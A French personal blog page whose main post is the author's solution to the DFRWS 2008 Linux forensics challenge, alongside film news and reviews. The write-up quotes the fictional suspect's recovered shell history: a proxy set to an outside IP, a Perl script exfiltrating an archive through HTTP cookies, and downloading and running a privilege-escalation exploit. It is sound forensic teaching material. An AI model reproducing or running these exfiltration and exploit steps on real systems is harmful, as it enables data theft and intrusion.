devloop :: blog

Un air de ressemblance

C'est complétement par hazard que je suis tombé sur une image où je retrouvais le logo de présent blog. A l'origine j'avais trouvé le smiley seul sur un autre site avant de le réutiliser, mais sur cette nouvelle image il était accompagné...
Après un bon temps passé sur Google et Yahoo!, j'ai finalement retrouvé l'image et l'auteur original. Il s'agissait d'un sympathique wallpaper :)

J'en profite pour faire un petit screenshot de mon environnement actuel (ça faisait longtemps) : KDE4 avec le thème Aya et un Widget qui m'affiche les strips de User-Friendly.

Inforensique en vrac

C'est la classe : ma solution du challenge DFRWS 2008 a été citée sur le Computer Forensic Blog.

Mais ce n'est rien comparé au travail des développeurs de Volatility sur l'analyse de la mémoire des systèmes Linux.
Ils ont apporté des modifications à un outil de RedHat nommé Crash qui permet ainsi d'extraire de l'image de la mémoire la liste des processus, fichiers ouverts, connexions en cours, points de montages utilisés et bien plus encore.

Ils ont ensuite amélioré Volatility pour qu'il gère les images de mémoire physique Linux.
On retrouve les fonctionnalités qui ont été ajoutées à Crash ainsi que des possibilités supplémentaires pour extraire certains éléments de la mémoire : mémoire d'un processus particulier, paquets réseau...
Cela leur a par exemple permis de retrouver la communication FTP que je n'ai pas trouvé durant ma recherche :)

Volatility peut aussi être utilisé comme module dans PyFlag et au vue des captures d'écran ça a l'air impressionant ^_^

Changeons de sujet avec cet article de Dark Reading qui nous apprend que Bruce Schneier et un groupe de chercheurs auraient réussi à détecter la présence des systèmes de fichiers cachés par TrueCrypt.
Je m'attendais à lire des révélations croustillantes sur un oubli d'implémentation ou une faiblesse cryptographique, en réalité ils se sont seulement basés sur les traces d'accès laissés sur un système Windows qui montraient l'existence de fichiers sur une partition qui n'apparait pas dans la table des partitions.
Ils se sont notamment basés sur l'analyse des fichiers .lnk et des listes MRU (Most Recently Used) présentes dans le registre de Windows.

Je trouve que l'équation
présence des exécutables TrueCrypt + preuve de l'existence d'une partition qui n'y est plus = preuve de l'existence d'une partition cachée
est un peu rapide et est loin d'être fiable.
C'est ce que j'ai tendance à appeler le principe de l'entourloupe, à savoir bien que ces outils soient utiles, leur simple présence génère la suspicion chez la personne qui analyse le système. C'est pour cela que je regarde toujours avec un peu de recul le principe du déni plausible.

C'est en particulier vrai avec des outils spécialisés comme Stegeek, 2c2, 4C ou encore Elettra paru dans le dernier Phrack.
Ca me parait moins vrai pour les partitions cachées, surtout que la technique utilisée dans l'article n'est pas liée à TrueCrypt et pourrait même déjouer une méthode faite maison. Bref la faille n'est pas dans TrueCrypt mais plus du côté de l'utilisateur qui devrait prendre différentes mesures pour dissimuler son activité (et s'il utilise TrueCrypt il doit bien être capable de le faire :p )

Cinéma en vrac

The Dark Knight est sorti hier (18 juillet) aux U.S.A. et comme prévu, le premier teaser de Terminator Renaissance (titre original : Terminator Salvation) a fait son apparition.
La vidéo étant volontairement saccadée et pleine d'interférences, on n'en apprenda pour le moment pas plus sur le film. Les décors et l'ambiance apocalyptiques donnent toutefois le ton général du film :)
La nouvelle concernant ce quatrième épisode est l'arrivée de Helena Bonham Carter dans le film qui jouera le rôle d'une certaine Serena, personnage inconnue au bataillon. Les rumeurs vont bon train, pour certains elle jouera le rôle d'une méchante, voir même incarnera une terminatrice :)

Et pour découvrir tout ce que vous vouliez savoir sur Terminator, vous pouvez vous rendre sur l'encyclopédie dédiée sur Wikia.

Wargames: The Dead Code, reprend le principe du premier Wargames (avec Matthew Broderick).
Le film sortira le 29 juillet aux U.S.A., aucune date n'est communiquée pour une éventuelle sortie en France.
Pour le moment on a déjà droit à un premier trailer.

Il va y avoir (encore) une adaptation d'un vieux comic américain nommé Watchmen. Je ne connais pas l'original, on verra bien ce que ça donne.

Sinon une satire des films de vampires va sortir en salles le 6 aout. C'est français et ça s'appelle Les Dents de la nuit. On y retrouve pas mal de beau monde comme Patrick Mille (99F), Frédérique Bel (la Minute Blonde), Vincent Desagnat (collègue de Michaël Youn), Hélène de Fougerolles et Tchéky Karyo.
Il n'y a plus qu'à espérer que ce soit drôle :D

Ma solution du challenge DFRWS 2008

Introduction

Le Digital Forensic Research Workshop (DFRWS) est une organisation qui cherche à faire évoluer les recherches en inforensique, cela notamment par l'organisation d'un concours organisé chaque année depuis 2001.

Le challenge de cette année 2008 est ouvert depuis début mai mais comme j'en ai eu vent que récemment, j'ai commencé mon analyse seulement 3 jours avant la fermeture du challenge. Ce qui n'est pas bien grave puisque le challenge s'adresse principalement aux citoyens des Etats-Unis et je ne pensais pas le faire officiellement.

Je comptais poster mon analyse en fin d'après-midi mais force et de constater que je n'ai pas eu le temps et que les derniers détails que je voulait régler étaient plus prenant que je ne le pensais :p

L'objectif des organisateurs pour cette année 2008 est de faire avancer les méthodes d'analyse de la mémoire RAM des systèmes GNU/Linux. C'est pour cette raison que les données offertes pour l'analyse sont une image de la mémoire d'un système mais aussi un enregistrement de communications réseau (fichier pcap) et une copie des fichiers présents dans le répertoire personnel du suspect.
A noter que pour le répertoire personnel il s'agit vraiment d'une copie de fichiers et non de l'image d'une partition :(

Je tiens à signaler que dans ma version de la solution vous ne trouverez pas de tools ou de techniques de-la-mort-qui-tue sur comment extraire la liste des processus depuis une image RAM ou obtenir la liste des fichiers qui étaient ouvert depuis cette même image.
Après quelques recherches, le sujet m'a paru trop complexe et j'ai privilégié une analyse plus classique. Toutefois si le sujet vous intéresse vous pouvez vous plonger dans une thèse de 2006 réalisée par des étudiants de la Naval Postgraduate Schoolde Monterey (Californie) et baptisée An analysis of Linux RAM forensics ou le document Digital forensics of the physical memory de Maruisz Burdach et daté de 2005.

Le scénario

Votre entreprise est la cible de vol d'information. Une enquête a été faite avec surveillance réseau en parallèle qui a permis de souligner le comportement suspect d'un employé.
L'équipe sécurité de la boite a récupéré différentes données que vous devez analyser pour déterminer qu'elles ont été les activités récentes de cet utilisateur.

Votre entreprise souhaiterait avoir des réponses aux interrogations suivantes :

Quelle activité de l'utilisateur peut être mis en évidence d'après les données ?
Est-ce qu'une activité suspecte peut-être décelée sur ce système ?
Il y a t'il des preuves de collaboration avec une personne extérieure ? Si oui de quelle façon ?
Est-ce que des données sensibles ont été volées ? Sinon peut-on en savoir plus sur la nature des données et la façon dont elles ont été transmises ?

Analyse des fichiers de l'utilisateur

L'analyse des fichiers est sans doute la partie la moins intéressante du challenge. Principalement parce qu'il y a peut d'informations intéressantes. On devine facilement au nombres de dossiers présents que l'utilisateur n'utilisait pas le système depuis longtemps et n'a pas fouillé dans les configurations du système.
De plus on suspecte très vite l'utilisateur d'avoir fait un peu de ménage derrière lui. Notamment le dossier .Trash est manquant tout comme l'historique de bash.

D'après les fichiers présents, on est en mesure de dire que l'utilisateur utilisait un window manager basé sur GTK, très certainement GNOME.
La présence du fichier .gnome2/gedit-metadata.xml met en évidence l'utilisation de l'éditeur de texte Gedit. Ce fichier permet de garder en mémoire la position du curseur dans les fichiers qui ont été ouverts jusqu'à présent. Ainsi à la prochaine ouverture du fichier, le curseur est replacé à la ligne mémorisée la dernière fois.
Le contenu de ce fichier prouve l'édition des fichiers .bash_history, .bashrc, .lesshst et enfin d'un fichier ELF exploit.sh qui était présent dans un répertoire temp qui n'existe plus.
L'autre historique intéressant est celui de Midnight Commander situé à l'emplacement .mc/history.
On y voit le chemin du home de l'utilisateur (/home/stevev) et aussi un point de montage sur /mnt/hgfs/Admin_share.
Le dernier répertoire accédé est /media/disk/DFRWS, à priori une preuve du passage de l'équipe de sécurité lors de la récupération des données.

Un autre fichier nous permet de déterminer que le système utilisé est basé sur RedHat (du moins il utilise le gestionnaire de paquet YUM)

Analyse du cache de Firefox

L'utilisateur n'ayant de toute évidence pas pensé à vider son historique de navigation web, son contenu devient une véritable mine d'or.
Tout d'abord, le fichier cookies.txt nous permet d'avoir facilement une liste des sites qu'il a visité. Une fois que l'on retire les habituels sites d'ADS/trackers/publicité, il nous reste la liste suivante :
corporate.disney.go.com
disney.go.com
docs.google.com
forum.freeadvice.com
live.com
login.live.com
mail.google.com
noblebank.pl
spreadsheets.google.com
www.bankrate.com
www.derkeiler.com
www.google.com
www.msn.com
travelocity.com

La grande majorité des sites visités sont pour le moins classique. Il y a seulement la présence de derkeiler qui laisse suposer que l'employé s'intéresse à la sécurité informatique (ce site rassemble des mailing-lists sur le sujet).

Firefox : les fichiers formhistory.dat et history.dat

Ces deux fichiers sont écrits dans un format pour le moins étrange. Après quelques recherches on apprend que cette structure est du Mork, un format de fichier pour le moins critiqué...

Pour décoder ces deux fichiers j'ai testé différents logiciels gratuits et open-source comme demork.py qui transforme les données en une version XML, mork.pl qui présente les résultats très simplement sous la forme d'une liste et fhdump.pl qui, si mes souvenirs sont bons, ne m'a rien renvoyé.
Mais je crois que mon préféré a été celui de Foundstone baptisé DumpAutoComplete et qui fonctionne sous Windows (exe) comme sous Linux (version Python) et donne un output XML plutôt sympathique.

Le fichier formhistory.dat stocke le texte que l'utilisateur a saisie dans des formulaires. On n'y retrouve toutefois pas de mot de passe, l'utilisateur n'ayant probablement pas activé cette fonctionnalité.
Une partie intéressante de ce fichier est celle qui conserve les recherches effectuées depuis le navigateur. Ces informations données par l'outil de Foundstone se représentent ainsi :

<field name="searchbar-history">
  <saved>CAN-2005-1263</saved>
  <saved>extradition costa rica</saved>
  <saved>maldives</saved>
  <saved>non-extradition countries</saved>
  <saved>overseas credit card payments</saved>
  <saved>panama extradition</saved>
  <saved>private banking</saved>
  <saved>privilege elevation 2.6.19</saved>
</field>

Il semblerait que notre suspect ait envie de s'éclipser quelques temps dans une contrée où il ne risque rien et, si possible, au soleil voire dans des paradis fiscaux ^_^
Il a aussi effectué une recherche sur des failles de sécurité du kernel qui pourrait lui permettre de passer root sur sa machine (ou une autre).

Les autres informations saisies par formulaire nous apprenent que notre suspect se prénomme Steve Vogon, qu'il a deux adresses mails qui sont Steve.Vogon@gmail.com et steve_vogon@hotmail.com et qu'il compte prendre un avion à destination du Costa Rica avec une certaine Catherine Lagrande.
Steve est joignable au 202 555 9900 toujours d'après le fichier formhistory.dat.
Je tiens à préciser que je n'ai pas forcément obtenu ces informations dans le même ordre que l'article mais j'essaye de suivre un ordre logique pour expliquer :p

Le fichier history.dat rassemble, dans l'ordre, les urls que l'utilisateur a visité. Cela nous permet de comprendre mieux le cheminement suivi lors de ses recherches sur Internet et on pourrait ainsi créer une timeline de son activité.
Je vous passe les détails de cette navigation, le principal à remarquer est que l'utilisateur est allé voir ses messages sur GMail et Windows Live et qu'il semble faire une utilisation assez soutenue de Google Docs (l'ancien Writely) et de Google Spreadsheet. Des services de travail collaboratif en ligne.

Les mots de passe enregistrés par Firefox

Firefox utilise un système de chiffrement particulier. Les mots de passes sont stockés chiffrés dans le fichier signons2.txt, protégés à l'aide d'un mot de passe maitre présent dans key3.db (chiffré lui aussi à priori).
Les fichiers cert8.db et secmod.db entrent aussi en compte dans ce système.
Un outil en Ruby ainsi que FirePassword permettent d'extraire les informations de ces fichiers... mais il faut connaître le mot de passe maître, aussi je n'ai pas cherché plus loin.

Le cache de Firefox

En l'occurence présents dans .mozilla/firefox/n5q6tfua.default/Cache, ces fichiers n'ont pas d'extensions et ont un nom composé de 11 caractères dans l'alphabet hexadécimal (de 0 à 9 et de A à F).
Le plus simple est encore de profiter de la force de Linux qui détermine le type des fichiers à partir de leur entête. Avec un simple gestionnaire de fichier comme Dolphin, une visionneuse d'images comme Gwenview, un éditeur de texte et un navigateur web, on peut analyser la quasi totalité des fichiers.
Restent les archives gzippées qui requièrent une étape supplémentaire de décompression et les fichiers _CACHE_00X_ générés par le navigateur.
Après avoir cherché sans succès un outil open-source fonctionnant sous Linux pour lire ces fichiers CACHE et m'être cassé la tête pour essayer de faire fonctionner un script python pas au point, je m'en suis remis à PhotoRec qui s'est montré particulièrement efficace pour en extraire des fichiers (les fichiers _CACHE_XXX_ sont un peu comme des archives tar, le fichier _CACHE_MAP_ est la carte disant à quel offset se trouve chaque fichier)

Les images extraites permettaient de voir que le suspect est allé sur le site et le blog de Projet Metasploit et différents sites de voyage.

Dans le cache du navigateur on retrouve aussi énormément de code javascript ou CSS qui ont été chargés avec les pages. Concernant les connexions à Google vous avez peut-être déjà remarqué que ce dernier se sert en grande quantité du format d'échange JSON. Le résultat c'est que les données qui nous intéressent ne se trouvent pas dans les pages HTML mises en cache mais dans des fichiers textes à part...

Au final on en extrait la conversation suivante avec une certaine Faa Tali :

Re: Negotiate (Google Docs)
I apologize for the delay -- I was required to travel recently.
I agree with your final terms and will contact you via the cell provided to discuss the transfer. I have received your software package and instructions for transfer.

On Dec 9, 2007 3:15 AM, faa tali wrote:
We are close, but please notice the changes I made. Let's move this along. A swift resolution would be appreciated.

Date: Sat, 8 Dec 2007 21:53:26
Subject: Negotiate (Google Docs)
From: Steve.Vogon@gmail.com
To: faatali@hotmail.com

I've shared a document with you called Negotiate
http://spreadsheets.google.com/ccc?key=XXXXX&inv=faatali@hotmail.com...
It's not an attachment -- it's stored online at Google Docs. To open this document, just click the link above.
Please answer on the prices and items listed.

On apprend par ce mail que notre suspect négocie le prix de différentes informations et ce par le biais d'un tableur partagé sur Google Spreadsheets. Il est aussi question d'un logiciel et d'instructions pour un transfert.

Plus tard, Steve renverra un message à Faa Tali qui est le suivant :

On Sun Dec 16 2007_10:24 PM
To: faa tali
Subject: Delivery information

Hi, I will be delivering the items as we discussed. I plan to use your 219. location for the items.
Please check for them within the next few hours and then arrange for a reciprocal transfer.
There is one item I will keep in reserve subject to your follow-through. It's noted on the spreadsheet.

On apprend que l'employé par envoyer les éléments sur le 219. La nature des données est listée dans le tableau que Steve a mis en ligne. C'est une information importante qu'il va nous faloir récupérer ;-)

Dans un sujet pas si éloigné que ça, Steve Vogon a aussi effectué une recherche Google sur les termes private banking qui l'ont amené sur le site http://www.noblebank.pl/.
D'après les même données formatées en JSON, on sait qu'il a demandé des renseignements auprès de cette banque :

To: investors@noblebank.pl
Subject: Minimum account  opening balance

Hello,
Can you please tell me what the minimum balance requirement is for opening an overseas account at your bank?
Thank you,
Steve K. Vogon

Il pense sans doute faire transiter l'argent de madame faatalis par cette banque.

Analyse du flux réseau

Je serais assez bref sur cette partie du challenge. Le fichier pcap fournit ne contient que des communications HTTP et des requêtes/réponses DNS mis à part une poignée de pings (ICMP ECHO). Le traffic HTTP n'est ni plus ni moins celui que l'on retrouve dans le cache du navigateur.
J'ai vite parsé le fichier pcap dans Chaosreader que je ne pense pas abandonner de si tôt :p
C'est vraiment très pratique et j'ai passé énormément de temps à étudier les logs par l'interface qu'il a généré et je me suis souvent référé à son résultat pour vérifier tel ou tel élément :)

Un des points que j'ai toutefois relevé avec Chaosreader et pas avec le cache du navigateur est que l'utilisateur du système s'est rendu sur ekiga.net/ip/ et que le site a retourné que l'adresse ip du suspect depuis l'Internet était 24.3.109.26 (en local son ip est 192.168.151.130).

Ce que en revanche je ne m'explique pas, c'est le temps qu'aura passé l'utilisateur sur le site de Disney... peut-être souhaite-t-il se reconvertir en Mickey Mouse ?

L'analyse de la mémoire

Le dump de la mémoire physique fait 284Mo. Son analyse a été très intéressante même si j'aurais passé énormément de temps pour rien les yeux collés devant des outputs de hexdump :p
La recherche s'est faite à grands coups de grep avec les options -b (afficher les offsets correspondants), -a (traiter le fichier comme si c'était un fichier texte) et parfois -i (insensible à la casse).

Les termes recherchés ont été déterminés à partir des éléments obtenus précédemment.
Par exemple en sachant que le nom d'user du suspect est stevev et le nom d'hôte du système est goldfinger, une recherche sur stevev@goldfinger a permis d'extraire des commandes tappées sous bash :

[stevev@goldfinger ~]$ export http_proxy=http://219.93.175.67:80
[stevev@goldfinger ~]$ cp /mnt/hgfs/software/xfer.pl .
[stevev@goldfinger ~]$ ./xfer.pl archive.zip
Preparing archive.zip for transmission ......
Sending now. Patience please
Data transmission complete.
Exiting
[stevev@goldfinger ~]$ rm archive.zip
[stevev@goldfinger ~]$ unset http_proxy
[stevev@goldfinger ~]$ rm xfer.pl
[stevev@goldfinger ~]$ rm archive.zip
[stevev@goldfinger ~]$ netstat -tupan

Cette suite de commandes met en évidence l'utilisation d'un script perl qui a permis de transférer une archive zip vers une machine, et ce après avoir défini un proxy dont l'ip commence par... 219 (quel hazard !! ;-) )

Une recherche sur #!/usr/bin/perl nous permettra de retrouver les quelques scripts perls présent dans la mémoire du système. Après visualisation par hexdump et avoir affiné les offsets (hexdump -C -s 258019329 -n 3208 challenge.mem) on peut extraite le script avec dd (dd if=challenge.mem skip=258019329 bs=1 count=3208 of=xfer.pl)
Le fichier obtenu est visible ici : xfer.pl sur pastebin.ca. La coloration syntaxique est un peu cassé à la fin à la cause des backquotes mais on arrive à lire la grande majorité :)

Le script xfer.pl

Le script en question est pas mal pensé. Il utilise une technique de covert channel (voyez ça comme de la stéganographie réseau) qui fait passer un fichier en petits morceaux à travers la section Cookie des requêtes HTTP.
Techniquement le fichier est d'abord encodé en base64 puis coupé en morceaux de 1236 octets. Le script a une liste d'urls prédéfinies et il envoie une simple requête HTTP GET vers les sites en insérant le morceaux de fichier encodé.
On voit dans le code que le script a recours à la commande wget pour envoyer les données. Seulement le problème avec wget c'est qu'il est trop bien conçu. Ainsi s'il tombe sur une redirection il va renvoyer la requête jusqu'à ce qu'il parvienne à la bonne url.
Pour éviter les doublons, le script rajoute un indicateur dans les requêtes HTTP permettant au récepteur de déterminer si le morceau qu'il recoit est bien la suite et non une copie du précédent.

Pour extraire l'archive zip de ce flux caché, j'ai d'abord recréé un fichier pcap en créant un filtre sur les paquets à destination de 219.93.175.67:80 (le récepteur qui tient en plus le rôle de proxy).
J'ai ensuite utilisé tcpflow pour extraire les requêtes HTTP brutes avec la commande suivante :

tcpflow -r agadou.pcap  -c > reqs.txt

J'ai retiré les doublons dans le fichier texte obtenu puis écrit un code assez maladroit (d'où l'étape préliminaire) pour recréer l'archive zip :

#!/usr/bin/env python
import base64

f=open("reqs.txt")
zip=""
while True:
  line=f.readline()
  if line=="": break
  if line.startswith("Cookie: "):
    if line.find("CVal=")>=0:
      zip+=line.split("CVal=")[1].strip()
    if line.find("Sessid=")>=0:
      zip+=line.split("Sessid=")[1].strip()
    if line.find("RMID=")>=0:
      zip+=line.split("RMID=")[1].strip()
zip=zip.replace("\n","")
print zip
zip=base64.b64decode(zip)
fo=open("archive.zip","w")
fo.write(zip)
fo.close()
f.close()

Archive.zip

Si on regarde à l'intérieur, on voit que l'archive contient les fichiers suivants :

Archive:  archive.zip
  Length     Date   Time    Name
 --------    ----   ----    ----
   141824  12-08-07 14:19   mnt/hgfs/Admin_share/acct_prem.xls
   100864  12-08-07 14:09   mnt/hgfs/Admin_share/domain.xls
     2395  08-05-00 16:54   mnt/hgfs/Admin_share/ftp.pcap
 --------                   -------
   245083                   3 files

Seulement.. l'archive est protégée par mot de passe. Ma première idée a été de continuer à fouiller dans la mémoire pour essayer de trouver le mot de passe.
L'utilisateur a créé l'archive en ligne de commande :

zip archive.zip /mnt/hgfs/Admin_share/acct_prem.xls /mnt/hgfs/Admin_share/domain.xls /mnt/hgfs/Admin_share/ftp.pcap

puis il a protégé par mot de passe en utilisant la commande zipcloak

zipcloak archive.zip

J'ai donc fouillé dans la mémoire en cherchant l'image de ces processus mais je n'ai vu aucun mot de passe autour des commandes zip ou zipcloak :(

Comme on n'est jamais mieux servi que par soit même (en tout cas dans mon cas sous Linux), j'ai tenté de casser le mot de passe en utilisant lzcrack, un casseur de pass d'archives zip que j'ai développé il y a un certain temps, mais je n'ai obtenu aucun résultat.

J'ai aussi tenté de trouver les fichiers en clair (avant compression) dans l'image de la mémoire mais aucun document xls ni aucun traffic TCP ni étaient présents.

Got r00t ?

Toujours à coups de grep j'ai pu découvrir une autre suite de commandes lancées par bash :

uname -a
who
ll -h
mkdir temp
ll -h
chmod o-xrw temp/
ll -h
cd temp/
cp /mnt/hgfs/Admin_share/*.xls .
cp /mnt/hgfs/Admin_share/*.pcap .
exit
uname -a
id
exit
X -v
X -V
X -version
cd temp
wget http://metasploit.com/users/hdm/tools/xmodulepath.tgz
tar -zpxvf xmodulepath.tgz
cd xmodulepath
ll
unset HISTORY
./root.sh
exit
pwd
cd ..
cp /mnt/hgfs/Admin_share/intranet.vsd .
ll
ls -lh
exit

On y voit notre pirate (on peut maintenant le dire :p ) créer un répertoire temp (qu'il supprimera par la suite) et y recopier différents fichiers.
Il obtient ensuite la version de Xorg sur le système, télécharge un exploit pour une faille de sécurité existante, l'exécute puis en profite pour récupérer un dernier fichier.
Comme on ne dispose pas des résultats des commandes il est difficile de dire si l'utilisateur a effectivement réussi à passer root mais le fait qu'il copie ensuite un fichier qui se trouvait dans le même dossier laisse supposer que des permissions l'avaient empéché de le faire plus tôt...

La suite de l'analyse de la mémoire a permis d'extraire des lignes de logs générées par syslogd, de voir qu'un serveur sendmail tournait, que steve a un uid de 501, que le système est une distribution CentOS avec un kernel 2.6.18 et qu'on trouve tout un tas de chose en mémoire.
Un peu de carving avec PhotoRec a révélé la présence de beaucoup d'images de la navigation web en mémoire, certaines partielles, d'autres complètes :)
J'ai aussi testé Scalpel pour l'occasion, mais je crois que je vais rester sur le précédent :)

Les trophés

Toute chose ayant une fin, voici le fameux tableau partagé sur Google. Les CSS n'étant pas intégrés, le rendu donne un peu brut :

L'invitation de partage du tableau à destination de Faa Tali
Steve Vogon... pas si américain que ça ?
A destination du Costa Rica, passage par le Salvador
Il y en a qui s'en font pas... pourtant c'est pas avec ces 57 dollars qu'il va se payer ça

Quelques critiques de films

Phénomènes
De M. Night Shyamalan (Sixième Sens, Incassable, Signes, Le Village)
avec Mark Wahlberg (La Planète des Singes) et Zooey Deschanel (H2G2).

Des phénomènes étranges se produisent dans des lieux publics. Les personnes touchées ont d'abord un comportement illogique (discours sans sens), se figent comme s'ils étaient déconnectés puis meurent. Les premières hypothèses sont celles d'attaques terroristes à l'aide de produits toxiques...

Je ne dévoilerais rien de plus sur ce film qui a très bien sû garder secret son contenu sans pour autant avoir recours à des méthodes exagérées pour faire parler de lui (*caugh*caugh*cloverfield*caugh*).
Un sacré challenge de tenir le spectateur en haleine quand on connait la nature de la menace... et pourtant le challenge est réussit. Quelques scènes bien gores, un passage pour le moins étrange avec une grand-mère folle à lier, ou une rencontre pour demander de l'aide qui se termine très mal, parviennent à entretenir la tension générale du film.

Les acteurs jouent plutôt bien, mais on en retire rien d'exceptionnel de ce côté. Il faut dire que les personnages principaux sont une famille assez atypique dont les relations semblent aussi être un mystère :D
A part ça le scénario est génial, très original, et rien que pour ça, ça vaut le coup de voir le film.

Et pour finir sur le côté philo je trouve que par les yeux des personnages, le réalisateur fait se déplacer la responsabilité de la faute sur tel personne, tel groupe, tel élément tout au long du film, comme pour dire que tout le monde est une menace potentielle pour les autres et même pour lui même...

John Rambo
De et avec Sylvester Stallone et Julie Benz (la bonde de la série Dexter)

John Rambo est un philosophe qui s'est retiré dans le nord de la Thaïlande pour vivre une existence pieuse.
Quand une équipe humanitaire lui demande de les amener en Birmanie, il est d'abord un peu réticent, puis reprends du service, bien décidé à prêcher la bonne parole aux autochtones.
Ses méthodes de conviction : machette, mitrailleuse, arrachage de carotide à main nue et vidage de tripe à chaud (sans anestésie).
Certes ça gicle dans tous les sens, c'est bourrin au possible et on peut laisser son cerveau au vestiaire... mais une fois de temps en temps ça fait du bien :)

Pi
De Darren Aronofsky

Max Cohen est un mathématicien. Pas n'importe lequel, l'un des plus brillants de son époque. Un peu autiste sur les bords, il supporte mal l'interraction avec les gens et suit un traitement pour calmer ses crises.
Le sujet de ses recherches : les séquences. Selon lui tout est mathématique, régit par des équations. Tout suit une séquence. Le support qui lui sert pour ses recherches est la bourse.

Ses recherches intéressent très fortement un cabinet financier ainsi qu'un groupe religieux juif qui étudie la Torah.
Pourquoi cela les intéresse-t-ils tant ? Sur quoi les recherches de Max vont-elles aboutir ?

Malgré que le film soit en noir et blanc, que les images aient un certain grain (du bruit comme dans les logiciels de retouche photo), et que le tout se passe sur les compos électroniques de Clint Mansell, le film ne souffre pas trop de son look expérimental.
Il faut dire qu'une bonne partie du film se déroule dans l'appartement de Max, et le noir et blanc rajoute une certaine ambiance. Max une sorte de Docteur Frankenstein qui cherche son monstre mathématique. Alors qu'il se rapproche de son but, sa folie et sa paranoïa grandissent.
Le film gagne en dynamique et en intérêt au fûr et à mesure qu'on approche de la fin. Très intéressant, mais pas forcément accessible à tous, on verrait bien Edward Norton y tenir le rôle de la vedette. Si l'intrigue vous intéresse, n'hésitez pas :)

Primer
Primer c'est l'histoire de deux chercheurs qui bricolent dans leur garage et déposent des brevets en tout genre pour gagner des sous. Des espèces d'inventeurs assez callés et très sérieux.
Alors qu'ils travaillent sur une machine en relation avec la pesanteur, ils observent des phénomènes pour le moins étranges pour tous scientifiques qui se respectent.
Il semble que la machine qu'ils ont construit ait une incidence sur le temps...

Le film n'est pas un film d'action, presque tout se passe par les dialogues entre les deux personnages principaux. Malgré tout on regrette l'utilisation presque systématique de plans fixes qui ne dynamise pas l'histoire. Les personnages sont très rationnels, peut être trop, ça aurait pû être intéressant de les voir paniquer un peu plus, prendre plus de risques.
En comparaison, si j'étais un professeur qui corrigeait une copie, je mettrais probablement peut mieux faire :-|

Requiem For A Dream
De Darren Aronofsky (encore) avec Jared Leto, Ellen Burstyn, Jennifer Connelly, Marlon Wayans.

Harry est accro. Il n'hésite pas à voler sa mêre pour se payer ses doses. Avec sa copine Marion et son meilleur ami Tyrone, ils pensent se faire de l'argent en revandant de la drogue recoupée.
Un film plutôt déroutant au début, on alterne les scènes autours des 3 jeunes et celles centrées sur la mère qui passe son temps devant la télévision. On se demande où le réalisateur souhaite nous amener... puis on comprends.
Un film très poignant sur les dépendances : drogues, antidépresseurs, sucre, télévision, amour...

Dead or Alive
Que peut-on espérer d'un film se basant sur un jeux vidéo où les combattantes sont des bimbos aux pixels savamment répartis ? Ma foi pas grand chose. En en effet, on n'y trouve pas du bon, par contre il y a du bonnet :D
Le casting aurait pû se limiter à Holly Valance (chapiteau! lol) ça nous aurait suffit, mais il en fallait pour tous les goûts donc on a aussi l'asiatique, la texane etc. Le film est vraiment monté comme un jeu vidéo, avec interludes, classement, logos, le tout à grands renforts de buitages...
Quelques pointes d'humour, malheureusement trop peu nombreuses, remontent un peu le niveau mais c'est loin d'être assez devant le scénario navrant.

35 heures, c'est déjà trop (vo: Office Space)
De Mike Judge (Idiocracy)

Office Space suit les aventures fictives de trois employés de bureau dans une entreprise contemporaine en cours de dégraissage.
Au début on doute... certes on sait qu'il s'agit d'un film comique... mais à quel point ? Va t'on tomber dans le ringard ? L'excés ? Est-ce vraiment drôle ?
Finalement le réalisateur a trouvé une bonne accroche avec son personnage principal... et justement... on accroche :)
Le film fait la critique de la vie au travail, en particulier des entreprises informatisées, en se moquant de tout ce que l'on peut subir au bureau.
Très sympathique à voir, le film doit prendre toute son ampleur si on le regarde entre collègues de boulot, il y a matière à débattre et rire pendant de bonnes heures :p
A noter la présence de Jennifer Aniston, qui joue plutôt bien dans le film :)

Bons Baisers de Bruges
Avec Colin Farrell, Brendan Gleeson et Ralph Fiennes.

C'est l'histoire de deux tueurs à gages qui doivent se mettre au vert quelques temps suite à une grosse bévue. Et où sont-ils envoyés ? Dans cette putain de Bruges !!

Tout à fait hors normes, le film tourne autour d'un humour particulier dont je ne me lasse pas. On oublie carrément les gangsters chiadés des films d'actions US, ceux-çi causent de tout et n'importe quoi et n'hésitent pas à ponctuer leurs phrases avec une savante dose de vocabulaire ordurier :)
Ce que l'on aime c'est surtout le décalage du personnage principal, Ray un tueur à gages débutant joué par Farrell, qui se comporte comme un véritable gosse qui tour à tour boude, trépigne et traine des pieds (c'est pas seulement une expression). Sans compter l'exploitation de bons gros clichés sur les différents habitants du globe (les ricains racontent n'importe quoi, les canadiens sont chiants) sans oublier les nains :D Le reste c'est de l'humour noir à gogo.
Le film se termine en changant complètement de cap mais n'en reste pas moins exceptionnel. A voir :)

Evan tout-puissant
Avec Steve Carell et Morgan Freeman.

Evan est un politique qui se lance dans la cour des grands. Un peu tendu par les changements dans sa vie, il s'ent remet à Dieu à qui il demande de l'aider à changer le monde (son slogan de campagne). Dieu répond à sa demande, mais pas comme il l'espérait, puisqu'il va lui donner pour tâche la construction d'une arche.

Sur le principe c'est moins nombriliste que Bruce tout-puissant. Plutôt amusant, n'entre pas dans le vulgaire (on est loin des cacaprout du genre BigMovie), c'est plein de bonnes attentions... un film familial tout public pour résumer et ma foi on en a vu des biens pires :p

99 francs
De Jan Kounen, d'après le roman de Frédéric Beigbeder, avec Jean Dujardin.

Octave est au sommet de son art, la publicité. Il travaille dans la plus grosse agance de pub, Ross & Witchcraft. Pris dans un engrenage décadant à base d'argent, femmes et drogues, lui qui était si haut, si sûr de lui et de son rôle dans la société, va finir par sombrer et se dégouter de lui même avant de finalement décider de frapper un grand coup pour tout faire s'écrouler.

Le film est à l'image de son personnage principal : très sophistiqué, chaque scène a l'air d'avoir été étudiée avec un soin tout particulier dans la mise en forme, l'objectif non dissimulé et d'exploiter les méthodes des publicitaires pour mieux les saccager, les exagérer jusqu'au ridicule, transformer des paroles agressives ou vulgaires en slogans commerciaux, ou injecter un élément destructeur dans une pub pronant la solidarité.

Le sommet est atteint avec du yahourt mis en scène comme si c'était une bonne dose de foutre :D
Le réalisateur se fait (et nous fait) plaisir en détruisant la pub bien ringarde d'une barre chocolaté qui n'est pas sans rappeler les fameuses pubs Kinder (vous savez, la fameuse famille à fils unique avec les coiffures d'une mode dépassée, dents blanches, look de bourges mais pas trop, coincés et propres sur eux à qui on donnerait des claques lol) ou encore en salissant un décor paradisiaque avec des paquets d'emballages.

Le film donne aussi un bon tour d'horizon du monde publicitaire, les différents boulots (créateur artistique, rédacteur publicitaire, photographe etc), comment tout ça tourne et donne son point de vue sur ce qui fait la qualité d'un film publicitaire (un côté analytique assez intéressant).

